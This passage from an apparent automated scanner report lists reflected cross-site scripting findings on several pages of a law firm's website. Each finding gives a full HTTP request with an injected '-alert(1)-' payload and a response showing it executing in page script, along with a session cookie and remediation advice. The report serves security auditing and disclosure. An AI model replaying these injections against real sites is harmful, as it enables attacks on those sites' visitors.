Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91';//]]>
...[SNIP]...

4.75. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /newsandevents

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1157; path=/
Set-Cookie: PortletId=1148501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | News & Events</title>
<meta name="language" co
...[SNIP]...
ent.aspnetForm.action = '/newsandevents/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/newsandevents/NewsEventsPubs.aspx?f75a8'-alert(1)-'99f649b592f=1';//]]>
...[SNIP]...

4.76. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /offices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=1152501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Offices</title>
<meta name="language" content=
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/offices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/offices/List.aspx?2c98b'-alert(1)-'fd3b25fecf2=1';//]]>
...[SNIP]...

4.77. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:08 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?f4da1'-alert(1)-'610b8b730dc=1';//]]>
...[SNIP]...

4.78. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice/?c53e5'-alert(1)-'9529b8f7a51=1 HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247989
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?c53e5'-alert(1)-'9529b8f7a51=1';//]]>
...[SNIP]...

4.79. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1164; path=/
Set-Cookie: PortletId=1155501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Privacy Policy</title>
<meta name="language" c
...[SNIP]...
nt.aspnetForm.action = '/privacypolicy/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/privacypolicy/GeneralPageData.aspx?df5e0'-alert(1)-'cd34e2cebf=1';//]]>
...[SNIP]...

4.80. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /probonooverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1148; path=/
Set-Cookie: PortletId=1139501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Pro Bono | Overview</title>
<meta name="langua
...[SNIP]...
cument.aspnetForm.action = '/probonooverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/probonooverview/ProBono.aspx?eb241'-alert(1)-'14889ea6214=1';//]]>
...[SNIP]...

4.81. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=1150501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Publications</title>
<meta name="language" con
...[SNIP]...
DATA[
document.aspnetForm.action = '/publications/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/publications/List.aspx?37aa1'-alert(1)-'7b6396f21de=1';//]]>
...[SNIP]...

4.82. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /recruitingthebestandbrightest

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1153; path=/
Set-Cookie: PortletId=1144501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Recruiting the Best & Brightest</title>
...[SNIP]...
ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]>
...[SNIP]...

4.83. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /retainingourdiversetalent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
